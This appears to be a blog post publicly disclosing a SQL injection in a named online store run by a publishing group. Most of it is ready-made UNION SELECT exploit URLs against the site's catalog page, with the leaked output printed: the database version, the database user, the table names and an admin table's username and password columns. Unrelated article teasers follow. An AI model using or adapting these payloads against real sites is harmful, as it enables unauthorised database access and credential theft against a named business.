PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.irrawaddystore.com owned by Irrawaddy Publishing Group.

These are some information from Vulneral Site http://www.irrawaddystore.com :

This vulnerability has been alerted to :- [email protected]

@@version,user(),database()

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,8,9,10,11,12,13,14,15,16,17,18--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>


5.0.90-community:irrawadd_user@localhost:irrawadd_store

9

table_name

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28table_name%29,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
<strong><a href="http://www.irrawaddystore.com/product.php?pro_id=1" target="_blank">store_admin,store_country,</a></strong>

column_name

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28column_name%29,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
<strong><a href="http://www.irrawaddystore.com/product.php?pro_id=1" target="_blank">id,username,password</a></strong>

We hope that your security staff will look into this issue and fix it as soon as possible.

Thx – Infofreakzzz for sending security updates!

Explore More

Winsock tutorial

Just a little something I have been writing on and off. It was originally meant to be a collaboration of two of my prior tutorials, however, I’m starting to find

Mobile trace – How cell phone tracing works? Technology, and software’s

Is it possible to track a GSM/ CDMA cellular phone? Is there a software in market which tracking the location of the phone? Is it possible to track lost mobile?

Gmail/ Google apps down!

Gmail and Google apps are down for almost 2 hours now. News, reader etc are working fine. Everyone getting 502/503 after few minutes n loading the page. Nothing official from